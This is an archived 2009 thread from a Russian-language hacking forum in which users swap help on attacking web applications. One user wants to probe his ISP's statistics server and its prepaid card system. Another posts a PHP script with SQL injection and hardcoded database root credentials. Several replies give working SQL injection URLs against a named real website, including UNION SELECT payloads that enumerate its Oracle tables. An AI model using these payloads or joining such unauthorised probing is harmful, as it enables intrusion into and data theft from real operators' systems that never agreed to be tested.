ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5671  
Старый 25.02.2009, 19:55
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию

https://forum.antichat.ru/showpost.php?p=1108085&postcount=2
https://forum.antichat.ru/showpost.php?p=1108479&postcount=3
 
Ответить с цитированием

  #5672  
Старый 25.02.2009, 20:19
Worms
Новичок
Регистрация: 09.05.2006
Сообщений: 24
Провел на форуме:
168619

Репутация: 2
По умолчанию

подскажите мне! у меня в сети есть сервак! через который сеть выходит в инет! на нем есть сайт статистики,вот я там полазил и нашёл такую штуку-в периоде с ...... по ..... если ставишь > то после поля даты появляется name=date_end> , а во втором окне если так же сделать,то будет name=date_beg>, а если поставить ' в самом поле периода вместо даты появляется вот так \' Так же доступно phpinfo.php
Что я могу тут сделать? я в php не оч шарю.И еще скажи мне если я через этот локальный сайт статистики ввожу карточку(которую покупаю для инета) он мне зачисляет на мой аккаунт деньги не выходя в нет! я вот думаю-значит бд карточек на серваке находится? или там другая система?
 
Ответить с цитированием

  #5673  
Старый 25.02.2009, 20:52
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию

похоже на XSS. Вообще по такому описанию сказачть оч сложно. или давай ссылку(!!!!!) или расписывай подробнее.
__________________
Появляюсь редко. Важные дела в реале.
 
Ответить с цитированием

  #5674  
Старый 25.02.2009, 21:47
Napas
Новичок
Регистрация: 30.11.2008
Сообщений: 15
Провел на форуме:
115871

Репутация: 16
По умолчанию

пробую эту фишку - http://forum.antichat.ru/showpost.php?p=663815&postcount=2
скуля, 8 полей,во второе вттыкаю кавычку в хексе,вылазает ошибка,пробую подобрать во втором запросе колонки,ниче не получаеццо ( скрипт прочитал бажный, вот код, должна ли тут работать эта фишка или меня глючит?
PHP код:
<?php

// Libraries
include '../php-bin/PageFunctions.php';
include 
'../php-bin/lib/querylib.php';

$nid = @$_GET['nid'];
$category = @$_GET['category'];

// If no nid, exit
if ($nid == "")
{
    echo(
"Error: no article ID");
    exit;
}

// Create a PageFunctions object
$objPFunc = new PageFunctions();

$query = new Query('localhost''root''4dm1n777'"www");

// Year hash
$tmonth = array();
$tmonth['1'] = "January";
$tmonth['2'] = "February";
$tmonth['3'] = "March";
$tmonth['4'] = "April";
$tmonth['5'] = "May";
$tmonth['6'] = "June";
$tmonth['7'] = "July";
$tmonth['8'] = "August";
$tmonth['9'] = "September";
$tmonth['10'] = "October";
$tmonth['11'] = "November";
$tmonth['12'] = "December";

$getitem $query->SQL("select * from newsitem where nid = " $nid " limit 1");
$item mysql_fetch_assoc($getitem);

$gettext $query->SQL("select * from newstext where nid = " $nid " limit 1");
$text mysql_fetch_assoc($gettext);

$getcat $query->SQL("select ctitle from newscategory where cid = " $item['cid'] . " limit 1");
$cattext mysql_fetch_assoc($getcat);

$query->Disconnect();

?>
add: бажный параметр - nid

Последний раз редактировалось Napas; 25.02.2009 в 21:51..
 
Ответить с цитированием

  #5675  
Старый 26.02.2009, 00:51
Worms
Новичок
Регистрация: 09.05.2006
Сообщений: 24
Провел на форуме:
168619

Репутация: 2
По умолчанию

Цитата:
Сообщение от Worms  
подскажите мне! у меня в сети есть сервак! через который сеть выходит в инет! на нем есть сайт статистики,вот я там полазил и нашёл такую штуку-в периоде с ...... по ..... если ставишь > то после поля даты появляется name=date_end> , а во втором окне если так же сделать,то будет name=date_beg>, а если поставить ' в самом поле периода вместо даты появляется вот так \' Так же доступно phpinfo.php
Что я могу тут сделать? я в php не оч шарю.И еще скажи мне если я через этот локальный сайт статистики ввожу карточку(которую покупаю для инета) он мне зачисляет на мой аккаунт деньги не выходя в нет! я вот думаю-значит бд карточек на серваке находится? или там другая система?
вот сделал скрин- http://pic.rapidshare.ru/941552 оригинала и что получается
 
Ответить с цитированием

  #5676  
Старый 26.02.2009, 01:05
cr0w
Познающий
Регистрация: 11.09.2008
Сообщений: 99
Провел на форуме:
2753780

Репутация: 585
По умолчанию

Napas

А зачем ты подбираешь количество колонок, когда там без вариантов одна колонка?
 
Ответить с цитированием

  #5677  
Старый 26.02.2009, 09:57
Napas
Новичок
Регистрация: 30.11.2008
Сообщений: 15
Провел на форуме:
115871

Репутация: 16
По умолчанию

2 cr0w
хмм, всмысле во внутреннем запросе?
так должен прокатить трюк со внутренним запросом или нет? и если да,как его реализовать,а то чет у меня мозгов не хватает
 
Ответить с цитированием

  #5678  
Старый 26.02.2009, 13:07
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

http://molod.karelia.ru/portal/page/portal/molod/main/kur?art=5' Скуль или нет?
 
Ответить с цитированием

  #5679  
Старый 26.02.2009, 14:42
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008

Репутация: 58
По умолчанию

2Assembler
http://molod.karelia.ru/portal/page/portal/molod/main/Officially?loc=2+and+1=1+--+
вот скуль)) blind))

http://molod.karelia.ru/portal/page/portal/molod/main/Officially?loc=-2+union+select+1,2,3,4,5,6,7,8,9,0,1+from+news+--+
Цитата:
The Error is: java.sql.SQLException: ORA-01790: выражение должно иметь тот же тип данных, что и соответствующее выражение
http://molod.karelia.ru/portal/page/portal/molod/main/Officially?loc=-2+union+select+null,null,null,null,null,null,null, null,null,null,null+from+news+--+

Последний раз редактировалось j0ker13; 26.02.2009 в 14:48..
 
Ответить с цитированием

  #5680  
Старый 26.02.2009, 15:00
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

а вот и все таблички
http://molod.karelia.ru/portal/page/portal/molod/main/Officially?loc=-2+union+select+table_name,null,null,null,null,null ,null,null,null,null,null+from+sys.user_tables+--+
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ